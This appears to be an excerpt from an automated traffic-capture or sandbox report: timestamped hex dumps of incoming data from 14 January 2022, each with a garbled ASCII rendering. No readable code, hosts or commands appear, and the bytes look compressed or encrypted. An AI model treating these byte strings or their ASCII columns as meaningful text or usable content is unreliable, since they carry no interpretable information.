                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4718INData Raw: 89 33 23 45 96 b5 99 4f a4 1f 21 e7 79 2d 41 73 f8 32 89 da 8d 5c 78 c3 3f 24 32 1c 89 fb 1a d4 88 03 41 52 8a 4c e2 ce 40 8d d9 4a 77 e3 07 d6 6d 3c 2b fe fe b6 1b 62 a1 74 2d 02 3d 24 6b 9d 66 95 3f 3f 8e 4c a9 34 2a 5a e2 70 c3 1a 17 40 00 7a 2b 8b 05 a1 90 50 ed bd 05 28 dd 82 c3 f3 69 64 b7 53 27 6f 27 28 e5 8f 61 4d 2f 2f 11 6f 58 62 9f 77 14 2b 2a 78 dd 95 d0 20 4a 4e 74 31 b9 16 0d 1c f4 07 f6 c4 c1 ab c9 b6 ec 12 9b 0b cf 5d 47 6f 3b 87 62 2b 7a 7b 8c 5e 27 1f c5 8a d3 c1 28 d4 0b cf 65 57 e4 5d 94 0a d5 d8 23 8b e2 a7 9d 4b 8f e6 ef 57 12 7a 0b c4 df 54 bc ef 8b a6 2b 20 90 b0 44 89 f4 9f e2 5e fc 30 6d 5d f4 31 3b cd 94 61 e7 8e 0b d8 a0 2f c8 a0 8f 24 c4 db c4 50 75 44 30 54 f7 47 e9 c6 2e 70 03 78 27 ec 7a e5 5b 45 5a 5c 92 66 78 b4 d5 84 c5
                                                                                                                                                                                                    Data Ascii: 3#EO!y-As2\x?$2ARL@Jwm<+bt-=$kf??L4*Zp@z+P(idS'o'(aM//oXbw+*x JNt1]Go;b+z{^'(eW]#KWzT+ D^0m]1;a/$PuD0TG.px'z[EZ\fx
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4734INData Raw: 55 fe 4d 9c 06 0a 94 45 8e 42 de 2f 02 6e 46 75 a5 87 ec 4c 50 3c 4f 28 9d bc 3b c4 79 6f f7 5e 36 86 f9 84 ea c8 49 21 2f df da 52 4a c3 3c b6 eb af a4 8c 29 7e 86 28 43 4b 9f 37 08 b2 af c2 e8 5f bb b5 e8 27 4a 04 3e 0b 63 ec 5d 8d 8e fc 77 2a 97 be 6f c5 75 35 b8 94 0c bc 0f d9 2b ed 70 06 b6 98 c9 e2 58 57 7b 76 ad d9 f7 91 26 d5 bf d8 90 43 ff 94 63 09 72 07 00 46 86 aa e1 78 97 a3 40 f7 ee c5 de 10 6d 60 79 18 01 43 48 79 15 99 97 7e 45 9f bc 38 d4 b6 fe 38 40 89 ee 3f 32 df 3e 9f b7 e9 0a d6 2f ce 7a 51 9f 7c 6c b8 38 ea 26 07 a7 08 dc a1 07 ec e3 fa 96 44 b4 4d b2 d1 1e fb 2c da c6 d4 bb c8 35 76 98 26 1f b7 62 20 a1 c7 4b 58 31 5f 18 fa 83 d3 34 1b 80 77 3b e9 63 84 c8 6a ee 75 44 f0 0d 79 1b 96 37 41 dc e1 a4 65 e7 fb 33 cb 89 6f 0d b2 74 80 e8
                                                                                                                                                                                                    Data Ascii: UMEB/nFuLP<O(;yo^6I!/RJ<)~(CK7_'J>c]w*ou5+pXW{v&CcrFx@m`yCHy~E88@?2>/zQ|l8&DM,5v&b KX1_4w;cjuDy7Ae3ot
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4750INData Raw: e1 21 6d 2e fc eb 4f 24 91 33 3c d4 0a bc 70 d1 40 da 09 97 2b a0 d9 29 c2 d9 3c 8e e2 45 8e 1c 92 7c 0a 5f ae a7 8d cb b4 d3 17 50 86 f4 59 83 5f 4a 02 cb 3e 7c 40 d5 03 9c 67 95 50 cb 4a c5 a1 41 b0 3f 0d 64 90 61 29 f0 7b dd 46 0a 90 e9 59 ba 0e b9 b1 44 c8 f5 90 bc ee d4 b1 55 d4 03 df 20 b2 6b 90 f4 06 03 eb 8f 92 2e 9a b0 35 33 e5 8c 91 96 63 c8 e6 78 05 89 50 92 22 db d0 17 c6 70 fd e1 e9 56 e4 37 36 fb c2 8f 43 d2 eb 4a e6 40 1e a8 10 98 ae 12 f7 8d 01 cb 1d 56 b0 ba 1b 57 87 45 65 83 88 57 28 01 0f 14 60 6a d2 51 10 e3 3e 9e a0 d0 d8 8b 5f 20 7b af c5 bd 15 16 e0 60 00 02 d7 d4 be 20 60 65 6c 92 67 d2 54 2e 0f ac 66 34 f8 31 3e c6 83 fa d8 f8 c0 80 54 1d 09 68 43 0c c0 69 9c 75 c6 55 2d 55 1e be df 67 fc 8a 18 0d 97 8f ad b6 92 f3 10 5a 9a 89 11
                                                                                                                                                                                                    Data Ascii: !m.O$3<p@+)<E|_PY_J>|@gPJA?da){FYDU k.53cxP"pV76CJ@VWEeW(`jQ>_ {` `elgT.f41>ThCiuU-UgZ
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4766INData Raw: 82 3d 70 41 63 23 5b 5b 9b db 6f 72 bd ee 1c 3d 0e 67 c4 ac 3e 86 13 2f 0a 18 94 75 de 0b ca 55 6b 1f ea 7f e7 0e 8f cb 0e 99 40 0b 9e 6d 05 f8 29 c6 85 9b e1 6b 17 e7 39 a7 57 85 8a dc 37 51 2d af 3d c9 57 53 5c 2a e8 f5 5c 67 ea 41 ed 9e f6 25 aa 28 e2 fd a4 3f ef 63 fd 69 13 31 b0 8e 48 18 d1 8e c7 35 cc 94 a2 f0 a6 cd 59 3d 5d c5 de da 73 b7 12 ea 0e 54 8b f2 f9 ce cb e9 2d b2 79 f1 85 b4 c4 6e db 8c b2 14 88 f2 7c 22 f6 de d3 30 ae af 0d e0 5d ae b7 5f ec cd d6 22 9b 0d 6f 87 a1 b3 82 f6 70 8c f2 50 8d e5 c9 9c 3e c3 ee af f5 97 72 88 21 19 6b c9 30 3c 25 8c 5a 1e 3d 3c 80 ec a4 15 04 3f 87 69 17 b1 51 7f 81 25 14 29 a8 58 aa a2 d6 ca 58 59 8d 45 72 42 cc 0a 2c 4a 57 bc 10 49 7c 4d c4 d5 68 3c 1d 98 d3 e4 c3 e5 a4 0a d7 67 74 65 aa dc 64 5c 0f 9a 12
                                                                                                                                                                                                    Data Ascii: =pAc#[[or=g>/uUk@m)k9W7Q-=WS\*\gA%(?ci1H5Y=]sT-yn|"0]_"opP>r!k0<%Z=<?iQ%)XXYErB,JWI|Mh<gted\
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4782INData Raw: c4 7f 00 0e 59 2b 67 da e9 d0 15 d2 ef 98 b4 0a 5a d6 82 80 e4 b2 e4 b9 5c 9c 20 56 49 e5 9f 75 76 3a b1 7d 60 f9 79 5a 83 f6 93 73 b7 1d 65 87 b0 55 ed 98 95 5a 1c e7 4c 5d 48 bf 11 2b 36 b3 38 d9 a3 74 43 40 1d 45 6e 66 96 93 29 57 43 32 13 db 3b a9 62 8a ed 46 44 f2 4f 90 6e 2a 26 9e 38 8e 5a 55 ac 07 e6 5c 54 88 97 20 8a 94 26 d8 bd e0 2f dc 96 58 ad 7b 60 1f 2a 86 cf 6c 7a af cc 2a fd 27 3f 26 e4 51 6d 1a 62 46 83 4c 22 c0 ac ea bd 7c 3e 99 32 10 70 22 3d 08 d9 bc 37 c9 e0 9d b3 fa df 50 d9 44 80 ad 8b 0f 9a 62 3c ca 67 35 c7 da 85 23 80 80 f1 11 17 98 12 d6 1e 39 09 05 b2 69 11 a5 c5 c0 82 a7 b6 d4 1b 9e 77 1c 26 50 69 89 31 ac 5b 54 3b 57 2e ab 99 ec 24 a5 37 a9 c6 94 36 77 1e c7 dd af bb 5b a7 2f b2 e3 fb 9f b2 5f b8 d2 c7 d9 93 0d bc c7 93 c2 25
                                                                                                                                                                                                    Data Ascii: Y+gZ\ VIuv:}`yZseUZL]H+68tC@Enf)WC2;bFDOn*&8ZU\T &/X{`*lz*'?&QmbFL"|>2p"=7PDb<g5#9iw&Pi1[T;W.$76w[/_%
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4798INData Raw: 1c 47 1e 3b 65 06 53 cc d2 75 f5 72 37 9e 9f 2d ce c3 b5 f3 35 57 f5 c6 15 9a c2 d4 dd ea 84 32 6f 89 0d 09 1d 0e dd ff 11 4e f7 fc 14 54 12 22 98 76 80 10 c2 75 61 db 98 73 d7 4a a0 da aa a7 cb d7 e3 91 f1 73 e6 96 f7 27 c0 f8 81 22 98 00 fe 5b 6b 49 21 94 49 43 53 fa 17 4a ca df 98 55 1e 2b 45 9c bc 84 6c b9 17 67 ea ee fb ac e5 1f be b3 09 c9 db 11 21 df 4b a8 2c 0a e9 a0 f3 27 f7 0b 97 20 a0 62 69 71 eb 05 3d fe a8 19 7b 05 2f c6 4a 22 3f b1 84 f6 83 11 7d 54 23 24 e8 ae 57 fc 89 85 84 88 89 00 4b bd 3c 95 db 54 6b c8 8e b5 cd 91 88 2b 15 f0 26 a2 a7 77 5b 77 24 07 eb b0 de 23 fa 5d 10 9e 34 5f cb 76 71 f3 44 ed aa 46 18 39 60 27 ea 3c 00 1a 0a 97 c4 ac dc ed 72 2d 23 b4 24 44 f3 00 8e 1b 4f 78 a6 07 7b 21 1c 29 45 63 c6 5a 84 11 a7 45 86 37 7e a7 23
                                                                                                                                                                                                    Data Ascii: G;eSur7-5W2oNT"vuasJs'"[kI!ICSJU+Elg!K,' biq={/J"?}T#$WK<Tk+&w[w$#]4_vqDF9`'<r-#$DOx{!)EcZE7~#
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4814INData Raw: 48 e4 de d1 79 7b e9 8d 86 43 b3 4f 95 dc 3a ef 05 35 e9 89 60 29 10 1f e6 9d 1e 07 b5 05 58 8e 9c fe ff fa 0e 7c 2a a2 3a 31 a0 77 61 b7 be 18 ba c8 b9 0e 58 12 c5 b4 e7 89 b1 65 4e 2e e7 dc 19 e2 d2 f3 96 f0 6b c3 72 7d 17 07 aa 0f 9a 88 b4 07 e7 45 34 ab f3 4e 12 c7 46 43 42 2b 76 34 eb 20 63 40 84 81 a9 4a 65 af 61 90 52 99 4f 0f 82 f2 0a f5 9f 03 82 26 d8 37 29 8a 63 bc 53 91 71 de 81 6b a3 a8 b1 4a 3e 15 57 3f 5c be 96 61 80 6d 9f e3 8e dc 48 d6 84 60 cb d6 91 70 44 31 f6 25 e7 92 e2 39 b5 cc 62 cc 8a 91 e9 8d be 7b 59 7b b4 c4 0d 6e c6 fd a2 ab 86 7a 8b 2e cf 99 da d1 9e 11 f6 cd ae de a7 d0 e0 d9 07 fe 8a a2 81 81 42 a7 48 9a a0 aa 29 e2 c4 c4 e5 bc e3 8c a6 d5 88 3f 84 d1 d0 c0 56 c9 29 cf 66 f2 17 71 55 fc 74 87 27 a3 68 05 f6 d0 3d 79 7e 21 a2
                                                                                                                                                                                                    Data Ascii: Hy{CO:5`)X|*:1waXeN.kr}E4NFCB+v4 c@JeaRO&7)cSqkJ>W?\amH`pD1%9b{Y{nz.BH)?V)fqUt'h=y~!
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4830INData Raw: 09 db b6 c0 35 ba ff fe a9 ed d0 3b b5 c5 64 c5 71 7c 97 81 ba 3b 03 44 3b 02 b7 e6 0b e3 32 d7 dd 1a b5 ba 99 41 41 9f f9 4f e1 6a ac 69 27 84 08 70 3e fe f7 b8 a3 05 9c 98 f4 f3 28 0d 20 22 6d 46 79 fe bf 8b d5 91 b5 99 00 aa 96 09 70 df e4 6d 1a c9 10 a9 24 ba 91 2a dc d2 a1 ea 51 68 da 72 20 81 12 4d 42 31 3f 86 e8 00 4a 8c 6b 86 97 78 c8 9d ba 0d 60 47 17 55 7e 80 3c c8 40 bb 74 bd b8 b1 b2 75 fa f2 60 94 6c 7c 84 48 72 83 a7 89 27 2f 4b 56 4d 17 e2 db fc 86 f0 11 54 7b 6e 09 10 61 d7 23 22 0a 58 cb f8 91 4a 61 c4 86 26 e2 ba 6b 28 bd 10 a1 5d 1d 5f 2c 25 72 b2 80 2a 57 e3 4b 3a 8f 9b 01 35 3b 48 03 2e a4 85 b7 47 72 6f 30 df 0b 36 0d 8a 05 18 95 cb c9 23 66 ec 2b 1e 0e 87 88 92 c3 88 fa ff 9e ac 00 82 e4 ae e1 03 c6 80 df 9d b4 8f 65 eb 24 d7 73 8c
                                                                                                                                                                                                    Data Ascii: 5;dq|;D;2AAOji'p>( "mFypm$*Qhr MB1?Jkx`GU~<@tu`l|Hr'/KVMT{na#"XJa&k(]_,%r*WK:5;H.Gro06#f+e$s
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4846INData Raw: 40 df 10 fa 58 a6 d1 5d a1 ac 40 21 3c d6 3d ce 7b dd 1b ab 83 2e 63 09 36 17 3e d2 ae f9 7c 92 c0 0d f3 a4 07 0f 5d 46 c4 50 a8 39 d3 fa ac 10 d6 cf 23 0e 3f c4 f5 91 fe b4 5d b3 e7 e2 93 c4 f5 08 36 7b 0f 09 e9 10 5a ab a0 06 15 3a 78 ad c4 82 c8 fb c6 cc 66 d9 4b 44 84 1f cf b9 2a a0 23 08 4a b9 d9 a8 a3 bb 79 2d d7 10 02 a1 fb eb ec 11 43 f7 cd 7c bc 14 e5 6c 04 a0 c4 fc b7 3f 89 e6 39 9f 4d dc d1 fe fe 4f 36 a5 6e ad f2 06 7c 97 b2 9e c6 1a 90 fb 45 be d2 92 a6 82 35 6a c7 a1 06 31 e1 e8 32 51 b5 cf e8 7e b0 b6 83 97 4d fa f8 c8 d2 b3 8d f7 26 c8 cc 57 b0 48 2c 4b 2d e8 60 0c 78 a6 3d eb f4 4b 1a 5d 83 97 b9 26 7f a4 e3 ef cf 49 dd a0 b0 6d 87 a8 b0 90 72 3f be 0b f3 da 9e 60 db 0d 16 14 c7 36 49 cc e9 fa 18 4c 1a f1 cf 92 ad e8 62 18 f1 a8 ea a2 f8
                                                                                                                                                                                                    Data Ascii: @X]@!<={.c6>|]FP9#?]6{Z:xfKD*#Jy-C|l?9MO6n|E5j12Q~M&WH,K-`x=K]&Imr?`6ILb
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4862INData Raw: 03 cc 53 ee a0 8d 0e 12 2c 73 c7 c9 e6 cd e2 91 49 fc 23 82 14 ed 3f ae 22 c1 de d2 9d fd d7 52 0d 4c 4d 5c 08 55 2c bf 5c f6 db f9 76 55 3e 75 ce c9 21 26 d4 9d c6 f2 ac f7 0a 54 97 4b a3 92 47 8c 78 8e d2 af 18 ef 54 a9 32 6d c4 bc 9e 1f 49 cb 37 22 cd b7 7f 96 2f fc e2 78 ae 2b da 99 f9 f7 6c b2 c2 66 f9 b1 b6 ca dc 8e 2f 92 9f 2e 4d ba 5b 5c 14 5f f8 20 fb d3 51 a0 a6 3c 98 ad 59 97 64 aa 34 e9 46 fb 94 52 8d cd 9e 6c 19 6f 9f be 89 a8 18 4f 75 02 b5 fa 18 a2 32 65 fa 34 4b 24 6f a6 b8 f2 d7 f0 30 48 fe c2 99 51 0f a8 0b 72 36 fe 67 73 4c b0 74 d8 28 ca ce 87 45 b6 e0 8b 6d 80 df 1b 69 1d d3 2a 4e 9e 0a 03 db 0e 1f 41 7e b8 2a 29 c4 6d 77 81 55 13 65 3a e9 f5 1e 5d 3c 13 ce de 7c 7d b6 c7 9c 85 59 99 1d 1b 30 ba 14 2e 96 c3 b7 05 95 82 e7 70 6f 0c 42
                                                                                                                                                                                                    Data Ascii: S,sI#?"RLM\U,\vU>u!&TKGxT2mI7"/x+lf/.M[\_ Q<Yd4FRloOu2e4K$o0HQr6gsLt(Emi*NA~*)mwUe:]<|}Y0.poB
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4878INData Raw: ac b7 87 35 82 8d a6 69 8d f1 5c 4c 3c 6f 09 23 58 bf 25 4e c5 44 e6 b7 97 a8 ac 90 f7 22 cd d3 c6 a8 af 13 7a 91 4a dd ec 19 f6 a4 c5 63 36 f3 8f f2 92 a4 06 29 78 33 70 e6 f0 24 84 b2 0e 74 cd b1 0b d1 d7 53 e0 6c e8 87 2b f1 b7 bb 6f 6c ee eb c5 f2 bc eb 05 b7 98 13 f5 78 59 b5 45 c2 49 df fb 3e 55 e1 27 83 a6 a7 d5 16 73 36 36 90 7b 3b ce e0 6d c9 5f 42 bd 66 36 35 c6 ef b6 7b fc d9 27 44 c1 30 87 09 e6 f0 0d 69 e5 5f 69 96 70 ce e0 f2 ef 28 2a 44 e3 33 79 5b 2d 7f 61 8e f5 9b 60 6c a3 41 c1 f6 3c 32 fa 32 cd f7 4d aa 58 47 4d e1 28 3d ec 76 0c 72 88 92 37 cc e2 f7 75 6b 48 c8 ca 36 f7 c1 a2 3e d2 88 aa d9 b5 a9 fb 36 7a d6 d9 fa 0e 24 f3 82 4f 98 c7 b3 a5 ac c9 92 41 d8 d0 01 26 fd 8d 0a c4 ed 46 01 bc 2d a0 9d e1 0e 88 18 ff b5 d2 1a d4 1a 93 c7 02
                                                                                                                                                                                                    Data Ascii: 5i\L<o#X%ND"zJc6)x3p$tSl+olxYEI>U's66{;m_Bf65{'D0i_ip(*D3y[-a`lA<22MXGM(=vr7ukH6>6z$OA&F-
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4894INData Raw: 80 d5 50 91 16 a4 61 c8 96 92 1c 32 ab 66 84 42 cc 40 ae e8 8c 5d 10 43 df 8d 96 f0 71 4d 55 10 3b 3f 6a 15 05 b7 8e 13 38 2f 72 04 8f c4 81 90 4e 9b 2b ea 35 a0 ec 66 ba 10 0a af 65 0c ca de d6 c4 1e 81 6a d3 b5 d7 be ac 13 4e 34 0e fd a0 42 93 56 e5 f8 75 6b 6c 0d 4b 39 c9 3a 39 11 46 04 55 14 ea d9 bf fd 39 d5 72 70 ef ed 7a c4 bf 9f 34 91 b4 f0 28 9b 25 31 9a 07 63 5a de 84 35 72 56 38 0a c7 cb 85 27 be 29 aa 80 b3 86 7b 2d e8 41 56 05 96 bf f6 8c bb 9d 40 01 e6 95 17 d0 32 ce dc 94 4b ec 4a cf 65 52 46 6d 60 72 07 d5 1a 37 0d ec bb 02 27 39 30 7e 3b c2 4c f6 1f e8 1b f1 2e dc 8d ff 0e 1e 27 ff 1e 87 09 95 59 1a 3e 5c 02 7d 34 a5 f6 fa 34 52 bb 93 e2 69 bd 76 1f f9 49 e8 d8 dc fe ba ee 6a 6f e6 7e cc 40 4e e4 b4 4a bd 54 75 d5 bf 78 d9 c5 ce 09 2f 06
                                                                                                                                                                                                    Data Ascii: Pa2fB@]CqMU;?j8/rN+5fejN4BVuklK9:9FU9rpz4(%1cZ5rV8'){-AV@2KJeRFm`r7'90~;L.'Y>\}44RivIjo~@NJTux/
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4910INData Raw: ab 65 ae b4 cf e4 7c 51 ea 7d 65 55 3a 2e 19 f0 25 5b 15 da 41 ee e1 78 7b 47 b3 28 f1 68 69 9a c2 f8 e4 ff 1b 6b 45 ee d1 44 af 47 93 89 9d 60 cd 02 a2 cb cc e0 83 bb e0 4c eb cc 10 d4 25 69 c2 b2 08 ae a1 ea 07 76 ae 02 b6 3a ed 21 53 ff d2 51 78 da 14 e2 5d ca 8f c5 d8 62 03 6a 23 38 90 8f d6 e7 df e6 1b 37 74 b2 b8 26 02 76 13 d9 30 c5 ed ec c0 7a 67 8c eb b1 5b 36 e0 05 fb 0b bc fc 65 3d 96 6d 67 cc a7 34 80 36 64 f3 4b e9 a0 c6 41 23 6d c2 2e 1d 19 9b ea 45 99 d6 34 de bb 5f 23 2e c5 44 71 13 38 c1 05 5b d5 49 1d f1 96 c5 c3 31 8c 40 c5 18 41 52 39 7b 6a 7c 79 57 26 06 2d 44 59 29 05 44 b5 0d a9 1c 00 91 99 9a 5d a5 9f bd 90 29 38 b9 db 71 c5 0f 3d 99 22 85 87 a6 fc 53 9c 02 f8 7e f3 17 4c 5c 31 13 8d 92 8e b0 f2 a2 8e 4c 15 cb f5 9e 6b 83 96 47 07
                                                                                                                                                                                                    Data Ascii: e|Q}eU:.%[Ax{G(hikEDG`L%iv:!SQx]bj#87t&v0zg[6e=mg46dKA#m.E4_#.Dq8[I1@AR9{j|yW&-DY)D])8q="S~L\1LkG
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4926INData Raw: 8f bd ed 92 40 db f3 e2 aa 04 b0 66 b7 02 22 e0 4d 6e d5 da cd 60 47 18 58 bf a9 5b c1 62 dc da 1a 48 49 19 1a ca 79 25 b0 95 48 6a 1f 57 4c 63 9b af db d2 e5 6a a9 85 1c 7b 72 4f b1 14 c6 18 90 ea c3 be 1d 2d 06 41 74 a6 e8 5d a3 a9 45 d2 e1 76 eb 84 0d 9d c8 3e 16 b0 a8 83 fb fa d5 f5 f1 fe c2 d1 11 c4 bd 62 0c 8c 9a 61 93 b1 13 49 c9 e6 07 6c 6a 70 ce 2d a7 72 9b 68 13 8d d0 ad da f9 0d 01 e8 aa 1f c1 e8 44 47 55 14 7d f7 40 0d c7 ae 88 02 95 db b9 43 a5 e4 f7 68 30 0e 68 03 3c fd 12 d1 40 e3 90 a5 85 01 39 66 4f 0e f6 b2 e5 ba f4 9a b7 44 5e 50 3a af fa 56 17 99 d3 7b 95 d3 ea 98 fc ef bc 5a e7 1c ef da a7 af ce 5d 2b ee 93 7f e2 08 df 52 06 ea 07 10 af ef ef 4f 31 a2 89 b5 03 23 d4 bc d8 e1 03 56 10 6b 2f 3d 49 7b a2 d9 c8 93 89 07 37 95 ff 53 b7 22
                                                                                                                                                                                                    Data Ascii: @f"Mn`GX[bHIy%HjWLcj{rO-At]Ev>baIljp-rhDGU}@Ch0h<@9fOD^P:V{Z]+RO1#Vk/=I{7S"
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4942INData Raw: 38 48 0f 68 0c 74 eb 37 b7 8a 0c b6 c2 36 52 47 58 90 e3 1c 76 d5 09 60 70 1c 89 d0 2f 37 28 68 44 86 27 7a 98 c9 89 59 82 96 d9 96 b6 ef 8e 9b 01 f8 29 62 f1 43 77 06 09 02 dd 74 2b 5b aa 56 de af 91 ef 38 bb 42 36 b9 c7 c6 38 cf 62 2f 8a 64 7d d7 e4 e4 93 0e eb 7f 45 e4 df 3d 57 4b 69 c2 c5 6f d0 67 4b c3 2c e6 c6 db 4e a3 56 b4 46 aa c2 0d ed 08 ec c6 10 0a dd c9 b0 c0 d3 57 7b 78 d3 ff 12 40 75 39 32 e1 7d 3c d7 e7 30 c5 db da ef a6 5c 76 b4 f3 58 a7 f5 9f 1e 13 99 98 10 c2 07 09 26 34 91 3b 0c 0e 4c 1f 40 7d 6f 32 67 05 ec 92 08 8a 68 09 93 71 62 59 a6 08 c3 2a 81 11 0d 05 5f 09 bd 3d 40 de 17 97 ae 1a a5 4c 3b 8a ba b7 ba dd 94 8b b8 fd 65 b3 1d f3 b8 0b fa 94 72 48 23 65 3c 9a b6 eb d9 cc dc 3f 87 95 2c da a1 b8 98 32 fd 7a b8 a8 de 9f a0 a2 9c a3
                                                                                                                                                                                                    Data Ascii: 8Hht76RGXv`p/7(hD'zY)bCwt+[V8B68b/d}E=WKiogK,NVFW{x@u92}<0\vX&4;L@}o2ghqbY*_=@L;erH#e<?,2z
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4958INData Raw: 28 45 8c 0d 60 e9 09 14 d4 8c d4 a1 76 27 98 b3 15 12 b3 81 d0 bf ce 49 6b 8c d5 16 3a d9 b0 c2 42 1f c2 8e 98 52 69 ee e1 1d f1 37 24 c3 32 c9 04 b4 02 da f7 2f 80 6b b7 e8 4f d3 25 97 bf 40 42 9e f9 8b b6 4a de 1f 0f 5a 35 38 09 b7 d2 8a aa d7 7e 27 ae c2 b4 11 2a 26 9d 84 68 7e 36 e7 fe cc fd 8a 53 96 bf 1c 8d b2 99 ab 38 5f 5e 79 61 8d 37 89 bd 09 90 e2 2c b5 8d ac 2d 17 8c 92 1b 75 99 eb f2 67 8f b4 ed 7d e4 b6 25 00 d3 95 d7 91 bc 6d e2 d6 f2 95 1a 3c 3c 73 34 a8 d9 a1 5e d7 2c 84 5d 9c 5f 45 45 a6 b8 88 f5 04 03 4f 9b 71 77 83 93 74 67 93 ee 36 09 f7 2e 07 62 ba 99 ce 78 94 67 d4 bc e7 2e 25 7a 45 cc 6f d0 4d 2d 38 63 23 45 d6 69 ec ad 63 23 22 06 14 42 04 09 61 22 fd 2d ae 5d a6 a5 2f 28 2c 1a 18 30 b0 08 bc 2d f3 f7 9f 37 44 8e 63 0e 8e 84 f6 8c
                                                                                                                                                                                                    Data Ascii: (E`v'Ik:BRi7$2/kO%@BJZ58~'*&h~6S8_^ya7,-ug}%m<<s4^,]_EEOqwtg6.bxg.%zEoM-8c#Eic#"Ba"-]/(,0-7Dc
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4974INData Raw: 11 5a e7 24 a5 48 8c 7e 9b 32 e4 6c 96 83 d5 2c 5b 6b e6 c9 84 fb 75 4d 76 58 d4 d4 96 93 0e 39 37 68 0f 0a c4 cf 5d 64 b2 07 30 1a 64 7a 23 a0 77 27 0b cf 72 b4 bc 06 1e 2b a2 e7 6d 4d 65 c8 94 c4 40 af 05 98 9b 1c a2 10 f9 e3 4f b2 d3 de da b8 ca 62 45 c3 75 e1 57 ea 4c d1 2e 73 2e a7 c0 b8 17 78 ea 46 27 59 30 6a 62 77 7e 22 dd 39 07 82 ed 14 a0 c5 73 e2 d8 95 ad 96 4b 2c 75 da a7 ed 39 e3 f9 3b 4c 95 26 c7 b6 07 f0 38 01 ad 89 18 bf f1 48 d3 1c 19 48 a5 3d b4 c6 65 be d2 ff 80 06 af bf 31 5e d2 d6 e4 71 bb a7 03 36 1d 4c 45 51 58 d2 63 ec aa 52 e8 47 82 e2 6e bd b7 f3 c4 4f 6c c5 7d 90 89 d0 eb 1b 92 7d 7b f7 94 64 ec f4 01 a2 8d fe a2 57 8e ec 63 c4 42 68 43 db c0 88 51 66 16 61 5c 53 9a ac 98 a9 04 68 f1 b7 bd 48 58 de 03 8b 32 95 4b 57 fe 8d 66 d4
                                                                                                                                                                                                    Data Ascii: Z$H~2l,[kuMvX97h]d0dz#w'r+mMe@ObEuWL.s.xF'Y0jbw~"9sK,u9;L&8HH=e1^q6LEQXcRGnOl}}{dWcBhCQfa\ShHX2KWf
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4990INData Raw: a4 96 92 ee 62 cc cd c6 a2 ab 02 5d f8 9f 21 19 70 07 16 03 2c 91 85 ee b1 15 e3 a1 76 1f 09 3f dc 48 f7 5f 1b 78 1a c6 8c 45 03 c9 00 a5 75 d0 a4 29 eb 92 8f bc 89 0f 00 92 03 db 35 aa a2 fa a0 70 f0 af 5b ee 57 a2 22 ab 2b 78 04 c2 ff ac a7 0e e5 32 08 d1 07 da 52 0c 90 fd 7b 2e 08 4b 86 8e be f8 b8 64 45 df 12 f8 60 3b 56 3d 8a 85 bc 8e e8 9c 52 01 3c ef 10 e7 fb d0 68 45 64 3c 6c 65 c5 aa 57 77 d6 6d 50 0e 0b e1 10 99 e9 d8 76 1b 8c e0 b3 ae e8 b1 5a 2e ec e4 86 34 5b 76 34 75 7d ac 62 d7 f7 f0 5d b8 eb a3 da 32 7d 69 73 1d a7 38 e0 d1 da 6f 4d 02 b9 60 24 eb c6 de ad 6c 53 7d e3 cb 91 4b f2 0c 41 38 b1 78 5c fe 95 6b b0 f4 66 2d d4 9a 12 4a 6d 77 35 96 2d 0a 7b 86 bc 35 12 79 29 5a 01 c4 cd 52 5f a2 0a 58 ed 0f 15 16 84 61 72 5a 9c 5a 27 11 4a 71 fd
                                                                                                                                                                                                    Data Ascii: b]!p,v?H_xEu)5p[W"+x2R{.KdE`;V=R<hEd<leWwmPvZ.4[v4u}b]2}is8oM`$lS}KA8x\kf-Jmw5-{5y)ZR_XarZZ'Jq
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5006INData Raw: 27 be 58 a2 79 60 5f 31 79 b6 4f 50 f5 6a 54 77 2c 76 62 34 8e 51 0d fb 54 42 48 bc 12 6a 24 5b d5 d6 e8 89 65 aa 3a be 71 01 6b 28 f8 aa cc 2d 0f d1 ab 55 13 0a 43 7e e9 7b 22 6b 8c cb 80 12 47 b4 da 7f 06 a8 31 0a e5 5e d3 dc d3 d1 cf f9 5b 84 50 9b 7f 2c 3b 90 5f 82 1a 9c e6 25 95 a5 a9 20 58 26 46 db 5f e7 bb 9c eb 14 64 dc 0b 94 1f 44 db 10 86 3f 6f 91 2f a7 bf 30 74 cc a5 fb 48 a6 fe 64 d4 51 e9 94 67 a2 0c 58 a8 98 64 be 7b 48 ee b0 02 03 1f e0 24 42 d5 58 e7 06 ec 66 a0 8e 09 23 a4 11 6b c6 08 3d 47 54 ee 02 1a 23 bf 4c c3 a8 08 9b 37 fe 60 79 0f 0a 6d b5 d4 eb d2 e7 65 08 9e 0b 00 c4 88 e7 7d 64 15 b0 f9 a3 e5 42 49 93 eb f0 8b 1a b4 91 75 05 bc 78 2b ea 60 31 9b a8 e7 f4 ac 9c 8d 3d 51 5b 2d f9 40 0e ca b9 c6 e1 17 e3 6c 39 4e 1f 9f 3c 3a 0c 7c
                                                                                                                                                                                                    Data Ascii: 'Xy`_1yOPjTw,vb4QTBHj$[e:qk(-UC~{"kG1^[P,;_% X&F_dD?o/0tHdQgXd{H$BXf#k=GT#L7`yme}dBIux+`1=Q[-@l9N<:|
